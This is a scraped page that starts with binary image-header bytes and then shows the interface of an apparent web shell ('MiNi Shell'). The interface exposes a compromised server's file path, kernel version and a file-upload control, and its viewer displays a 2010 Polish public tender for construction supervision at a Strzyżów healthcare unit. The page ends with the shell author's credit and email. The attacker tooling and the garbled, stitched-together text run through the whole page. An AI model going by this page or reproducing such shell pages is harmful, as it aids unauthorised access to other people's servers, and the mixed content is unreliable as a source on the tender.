JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101001/271441-N-2010.html

<p class="kh_header"><b>Strzyżów: Pełnienie funkcji INSPEKTORA NADZORU INWESTORSKIEGO nad robotą budowlaną realizowaną w ramach projektu pn: TERMOMODERNIZACJA SEGMENTÓW A i C
ZESPOŁU OPIEKI ZDROWOTNEJ W STRZYŻOWIE WRAZ ZE ZMIANĄ ŹRÓDŁA CIEPŁA
ORAZ WYKONANIEM INSTALACJI SOLARNYCH</b><br>
<b>Numer ogłoszenia: 271441 - 2010; data zamieszczenia: 01.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej , ul. Dąbrowskiego 10, 38-100 Strzyżów, woj. podkarpackie, tel. 017 2761058, faks 017 2761058.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozstrzyzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji INSPEKTORA NADZORU INWESTORSKIEGO nad robotą budowlaną realizowaną w ramach projektu pn: TERMOMODERNIZACJA SEGMENTÓW A i C
ZESPOŁU OPIEKI ZDROWOTNEJ W STRZYŻOWIE WRAZ ZE ZMIANĄ ŹRÓDŁA CIEPŁA
ORAZ WYKONANIEM INSTALACJI SOLARNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sprawowanie funkcji inspektora nadzoru inwestorskiego nad robotą budowlaną stanowiącą realizację zadania inwestycyjnego pod nazwą Termomodernizacja segmentów A i C Zespołu Opieki Zdrowotnej w Strzyżowie wraz ze zmianą źródła ciepła oraz wykonaniem instalacji solarnych. Robota budowlana została szczegółowo opisana w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót. 
2. Do obowiązków Inspektora nadzoru należy pełny zakres czynności określonych w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.), czynności wymienionych w specyfikacji istotnych warunków zamówienia oraz wynikających z oferty Inspektora nadzoru, w tym w szczególności:
1) reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności jej realizacji z projektem i wydanym pozwoleniem na roboty budowlane, przepisami prawa oraz zasadami wiedzy technicznej,
2) sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie w tym uczestniczyć w czynnościach kontrolnych; certyfikatów na znak bezpieczeństwa, deklaracji zgodności lub certyfikatu zgodności z Polską Normą lub aprobat technicznych a także innych dokumentów związanych ze sprawdzanymi materiałami lub urządzeniami,
3) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,
4) potwierdzanie faktycznie wykonanych robót oraz usunięcia wad w tym sprawdzanie i potwierdzanie Protokołu zaawansowania robót nie później niż 3 dni robocze od dostarczenia protokołu, a także, na żądanie Zamawiającego, kontrolowanie rozliczeń budowy.
3. Ponadto Inspektor nadzoru zobowiązuje się do wykonania wszelkich innych czynności koniecznych do prawidłowego wykonania przedmiotu umowy, w szczególności:
1) udział w postępowaniu przetargowym prowadzonym zgodnie z ustawą PZP w trybie przetargu nieograniczonego  na robotę budowlaną będącą przedmiotem nadzoru, zwłaszcza pomoc w: udzielaniu odpowiedzi na zadawane przez Wykonawców pytania, badaniu ofert oraz ich wyjaśnianiu,
2) wydawać kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących wykonywania prób, wymagających odkrycia robót lub elementów zakrytych, 
3) kontrola i odbiór robót budowlanych ulegających zakryciu lub zanikających,
4) żądać od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać straty materialne,  zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę,
5) prowadzić nadzór nad prawidłowym przebiegiem robót zgodnie z umową,
6) kontrola i weryfikacja wszelkich przedkładanych przez Wykonawcę robót budowlanych dokumentów,
7) organizowanie i prowadzenie narad technicznych, problemowych i innych spotkań w zależności od potrzeb, nie rzadziej niż raz w miesiącu,
8) rozstrzygać wątpliwości natury technicznej powstałe w toku prowadzonych robót, a w razie wątpliwości zasięganie opinii autora projektu,
9) kontrolować i weryfikować stan realizacji budżetu inwestycji w oparciu o kosztorys ofertowy Wykonawcy,
10) weryfikacja, analizowanie i zatwierdzanie do zapłaty faktur wystawionych przez Wykonawcę robót budowlanych w związku z realizacją umowy na roboty budowlane,
11) uczestniczyć przy przeprowadzeniu wszystkich prób, pomiarów i sprawdzeń,
12) egzekwowanie od Wykonawcy dodatkowych badań i pomiarów, względnie przeprowadzenia badań niezależnych, w przypadku wątpliwości co do wiarygodności badań Wykonawcy robot budowlanych,
13) uczestniczyć w komisji odbioru końcowego inwestycji oraz komisjach odbiorów gwarancyjnych, 
14) sprawdzanie ważności ubezpieczeń osób zatrudnionych oraz używanego sprzętu,
15) kontrola prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego,
16) z zastrzeżeniem postanowień § 6 umowy; sporządzanie protokołu konieczności w przypadku wystąpienia robót dodatkowych w myśl art. 67 ust. 5 ustawy - Prawo zamówień publicznych,
17) uzgadnianie z Wykonawcą robót budowlanych rodzaju dokumentacji powykonawczej, sprawdzanie jej i zatwierdzanie w porozumieniu z Zamawiającym,
18) przygotowanie w imieniu Zamawiającego kompletu dokumentów związanych z uzyskiwaniem wszelkich niezbędnych uzgodnień i opinii wymaganych przepisami (PIP, Straż Pożarna, Sanepid, WIOŚ itp.) w celu otrzymania pozwoleń na użytkowanie zrealizowanego obiektu lub jego części, odbiorem końcowym.
19) zarządzanie całym procesem przekazania obiektu do użytkowania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające będą udzielane na podstawie art. 67 ust. 1 pkt. 6 i będą polegały na powtórzeniu tego samego rodzaju zamówień o wartości nie większej niż 50% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku Zamawiający żąda od wykonawcy oświadczenia w formie załącznika nr 1, tj oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010r. poz. nr 759). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku Zamawiający żąda od wykonawcy wykazania się wykonaniem  co najmniej 1 usługi nadzoru inwestorskiego nad robotą budowlaną  tj. budowę, przebudowę, remont budynku użyteczności publicznej (definicja budynku użyteczności publicznej wynika z rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie - Dz. U. z 2002r. Nr 75 poz. 690 z późn. zm.) o wartości minimum 800.000 zł.i w obiekcie o kubaturze nie mniejszej niż 1000 m3 w zakresie: prace ogólnobudowlane, wykończeniowe, instalacje wod-kan, instalacje centralnego ogrzewania, instalacje solarne, instalacji wentylacji mechanicznych, instalacji gazów, 
 w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Ocena spełniania tego warunku zostanie dokonana w oparciu o wykaz zrealizowanych usług, złożone dokumenty i oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku Zamawiający żąda od wykonawcy oświadczenia w formie załącznika nr 1, tj oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2010r. Nr 113 poz. 759.). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku Zamawiający żąda od wykonawcy dysponowania osobami zdolnymi do wykonania zamówienia, tj mogących pełnić funkcję inspektorów nadzoru inwestorskiego zgodnie z obowiązującymi przepisami prawa w następujących specjalnościach: 
a) inspektor nadzoru budowlanego w specjalności konstrukcyjno-budowlanej bez ograniczeń z minimum 3 letnim doświadczeniem na tym stanowisku
b) inspektor nadzoru w specjalności  instalacyjnej w zakresie instalacji:
	-  cieplnych, wentylacyjnych, wodociągowych, kanalizacyjnych i gazowych
	- elektrycznych
	- solarnych.
Ocena spełnienia ww. warunków udziału będzie dokonywana metodą spełnia lub nie spełnia w oparciu o wykaz osób, oświadczenie o spełnianiu warunków udziału w postępowaniu i oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku Zamawiający żąda od wykonawcy oświadczenia w formie załącznika nr 1, tj oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2010r. Nr 113 poz. 759.). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Formularz oferty, ustanowienie pełnomocnika do reprezentowania Wykonawców ubiegających się wspólnie o udzielenie zamówienia w postępowaniu albo do reprezentowania ich w postępowniu i zawarcia umowy, pełnomocnictwo dla osoby nieupoważnionej do reprezentowania firmy na podstawie KRS.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty, ustanowienie pełnomocnika do reprezentowania Wykonawców ubiegających się wspólnie o udzielenie zamówienia w postępowaniu albo do reprezentowania ich w postępowniu i zawarcia umowy, pełnomocnictwo dla osoby nieupoważnionej do reprezentowania firmy na podstawie KRS.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony ustalają, że nie przewidują zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Inspektora nadzoru z wyjątkiem zmian, których konieczność wprowadzenia wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Zamawiającego, a nadto gdy:
a) nastąpią przekształcenia własnościowe,
b) nastąpią zmiany techniczne lub organizacyjne,
c) nastąpią zmiany adresu,
d) następuje konieczność poprawienia pomyłek,
e) nastąpią zmiany urzędowej stawki podatku VAT usług będących przedmiotem niniejszej umowy w czasie jej trwania Inspektor nadzoru zawiadomi Zamawiającego przed dniem wejścia w życie przepisów zmieniających. Zmiana stawek podatku VAT spowoduje zmianę kwot podatku VAT i ceny brutto wynikającej z umowy, cena netto pozostaje niezmienna. Powyższe nie dotyczy przypadków, gdy Inspektor nadzoru nieprawidłowo ustalił stawki podatku VAT w ofercie, w takim wypadku skutki nieprawidłowego wskazania stawki podatku obciążają wyłącznie Inspektora nadzoru. Nie dotyczy to przypadków zawyżenia stawki VAT w ofercie. W przypadkach wątpliwości co do wysokości stawki VAT Inspektor nadzoru obowiązany jest przedstawić Zamawiającemu urzędową interpretację właściwych organów skarbowych
f) zmiana następuje w wykonaniu postanowień niniejszej umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozstrzyzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej, ul. Dąbrowskiego 10, 38-100 Strzyżów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2010 godzina 12:45, miejsce: Zespół Opieki Zdrowotnej, ul. Dąbrowskiego 10, 38-100 Strzyżów, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze zamówienie jest prowadzone w ramach projektu pod nazwą TERMOMODERNIZACJA SEGMENTÓW A i C ZESPOŁU OPIEKI ZDROWOTNEJ W STRZYŻOWIE WRAZ ZE ZMIANĄ ŹRÓDŁA CIEPŁA ORAZ WYKONANIEM INSTALACJI SOLARNYCH współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego
w ramach działania 2.2 Infrastruktura energetyczna Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com